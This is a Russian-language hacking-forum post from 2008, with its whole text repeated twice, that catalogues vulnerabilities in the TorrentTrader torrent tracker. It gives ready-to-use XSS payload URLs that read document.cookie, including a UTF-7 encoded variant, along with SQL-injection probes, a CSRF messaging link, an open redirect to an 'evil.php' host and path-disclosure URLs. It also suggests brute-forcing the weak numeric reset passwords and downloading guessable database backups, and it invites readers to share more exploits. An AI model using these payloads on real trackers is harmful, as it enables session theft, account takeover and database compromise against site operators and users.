Nightmarе
27.07.2008, 04:18
Уязвимости TorrentTrader
Офф сайт разработчика: torrenttrader.org
На сегодняшний день последняя версия: FINAL v1.08 Notes(2008-06-17)
Скачать отсюда:
http://sourceforge.net/project/showfiles.php?group_id=98584&package_id=180927&release_id=545219
TorrentTrader – набирающий популярность торрент движок по размещению и скачиванию торрентов.
Для начала рассмотрим публичные уязвимости под различные версии:
TorrentTrader 1.0 SQL Inject
Эксплойт: TorrentTrader 1.0 RC2 SQL Injection © By aCiDBiTS (http://milw0rm.com/exploits/430)
TorrentTrader Classic v1.07
Тут у нас пару XSS от хакиря «HACKERS PAL»
Примеры:
http://site.com/tracker/pjirc/css.php?color=<script>alert(document.cookie);</script>
http://site.com/tracker/browse.php?cat=<script>alert(document.cookie);</script>
TorrentTrader Classic Edition 1.08
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" в сценарии account-inbox.php. Удаленный пользователь может с помощью специально сформированного частного сообщения выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример: http://site.com/tracker/account-inbox.php?msg=<script>alert('XSS')</script>
2. Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов перед отправкой частного сообщения. Удаленный пользователь может с помощью специально сформированной ссылки отправить произвольное сообщение пользователям приложения.
Пример: http://site.com/tracker/account-inbox.php?msg=<message>&receiver=<username>
3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "url" в сценарии redirect.php. Злоумышленник может с помощью специально сформированной ссылки перенаправить пользователя на потенциально небезопасный сайт.
Пример: http://site.com/tracker/redirect.php?url=http://remote_host/evil.php
Баги обнаружены 03 марта, 2008 © securitylab.ru
TorrentTrader версии 1.08 до 17.06.2008
1. Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах "email" и "wantusername" в сценарии account-signup.php и в параметре "receiver" в сценарии account-inbox.php (когда установлен параметр "msg"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Примеры:
http://site.com/tracker/account-signup.php?wantusername=’
http://site.com/tracker/account-signup.php?email=’
http://site.com/tracker/account-inbox.php?msg=’
Баги обнаружены 18 июня, 2008 © securitylab.ru
++++++++++++++
Теперь поинтереснее, баги найденные модератором античата gibson`om, для:
TorrentTrader v2.04:
1. Раскрытие пути и системная информация
check.php
ps если админ его не удалил, а то маячит в админке, так что не вариант, что файл будет на сайте.
2. Слабый пароль.
Меняем пасс через востановление и пасс меняется в диапозоне 10000 до 50000 только цифры. Можно написать брут на перле имхо идеальный вариант будет и перебрутить пасс.
ps Нужно мыло пользователя!
3. Возможно "тырить" бекап бд
backup-database.php buckup будет в /backups в формате
$db-$year$month$day-$hour$min.gz
ps если знаем название базы.
4. Xss
В сообщениях все фильтруется, но если используется кодировка utf 7, то все поля подверженны ксс.
+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-
В админке везде ксс, практически ничего не фильтруется.
xss при отправке репорта ([Report Torrent]), отправляем мессагу вставляем любые теги (активка). Мессага пойдет админу!
[c] gibson
++++++++++++++
Ну и далее пару мелких багов найденных мною.
TorrentTrader Classic Edition 1.08
XSS: http://site.com/tracker/account-inbox.php?receiver=<script>alert('Nightmare')</script>
Далее установил последнюю версию:
FINAL v1.08 Notes(2008-06-17) (скачал сегодня)
Наткнулся на раскрытие пути:
http://site.com/tracker/torrents-search.php?search=&cat[]=
http://site.com/tracker/torrents-details.php?id[]=
Поиск багов в прогрессе… ©
Кто ещё чем сможет дополнить, просьба публиковать различные сплойты, публичные, или найденные вами дырки.
Как показывают опросы, этот движок пользуется спросом в локалках разных провайдеров, так что… так..
:)
Офф сайт разработчика: torrenttrader.org
На сегодняшний день последняя версия: FINAL v1.08 Notes(2008-06-17)
Скачать отсюда:
http://sourceforge.net/project/showfiles.php?group_id=98584&package_id=180927&release_id=545219
TorrentTrader – набирающий популярность торрент движок по размещению и скачиванию торрентов.
Для начала рассмотрим публичные уязвимости под различные версии:
TorrentTrader 1.0 SQL Inject
Эксплойт: TorrentTrader 1.0 RC2 SQL Injection © By aCiDBiTS (http://milw0rm.com/exploits/430)
TorrentTrader Classic v1.07
Тут у нас пару XSS от хакиря «HACKERS PAL»
Примеры:
http://site.com/tracker/pjirc/css.php?color=<script>alert(document.cookie);</script>
http://site.com/tracker/browse.php?cat=<script>alert(document.cookie);</script>
TorrentTrader Classic Edition 1.08
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" в сценарии account-inbox.php. Удаленный пользователь может с помощью специально сформированного частного сообщения выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример: http://site.com/tracker/account-inbox.php?msg=<script>alert('XSS')</script>
2. Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов перед отправкой частного сообщения. Удаленный пользователь может с помощью специально сформированной ссылки отправить произвольное сообщение пользователям приложения.
Пример: http://site.com/tracker/account-inbox.php?msg=<message>&receiver=<username>
3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "url" в сценарии redirect.php. Злоумышленник может с помощью специально сформированной ссылки перенаправить пользователя на потенциально небезопасный сайт.
Пример: http://site.com/tracker/redirect.php?url=http://remote_host/evil.php
Баги обнаружены 03 марта, 2008 © securitylab.ru
TorrentTrader версии 1.08 до 17.06.2008
1. Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах "email" и "wantusername" в сценарии account-signup.php и в параметре "receiver" в сценарии account-inbox.php (когда установлен параметр "msg"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Примеры:
http://site.com/tracker/account-signup.php?wantusername=’
http://site.com/tracker/account-signup.php?email=’
http://site.com/tracker/account-inbox.php?msg=’
Баги обнаружены 18 июня, 2008 © securitylab.ru
++++++++++++++
Теперь поинтереснее, баги найденные модератором античата gibson`om, для:
TorrentTrader v2.04:
1. Раскрытие пути и системная информация
check.php
ps если админ его не удалил, а то маячит в админке, так что не вариант, что файл будет на сайте.
2. Слабый пароль.
Меняем пасс через востановление и пасс меняется в диапозоне 10000 до 50000 только цифры. Можно написать брут на перле имхо идеальный вариант будет и перебрутить пасс.
ps Нужно мыло пользователя!
3. Возможно "тырить" бекап бд
backup-database.php buckup будет в /backups в формате
$db-$year$month$day-$hour$min.gz
ps если знаем название базы.
4. Xss
В сообщениях все фильтруется, но если используется кодировка utf 7, то все поля подверженны ксс.
+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-
В админке везде ксс, практически ничего не фильтруется.
xss при отправке репорта ([Report Torrent]), отправляем мессагу вставляем любые теги (активка). Мессага пойдет админу!
[c] gibson
++++++++++++++
Ну и далее пару мелких багов найденных мною.
TorrentTrader Classic Edition 1.08
XSS: http://site.com/tracker/account-inbox.php?receiver=<script>alert('Nightmare')</script>
Далее установил последнюю версию:
FINAL v1.08 Notes(2008-06-17) (скачал сегодня)
Наткнулся на раскрытие пути:
http://site.com/tracker/torrents-search.php?search=&cat[]=
http://site.com/tracker/torrents-details.php?id[]=
Поиск багов в прогрессе… ©
Кто ещё чем сможет дополнить, просьба публиковать различные сплойты, публичные, или найденные вами дырки.
Как показывают опросы, этот движок пользуется спросом в локалках разных провайдеров, так что… так..
:)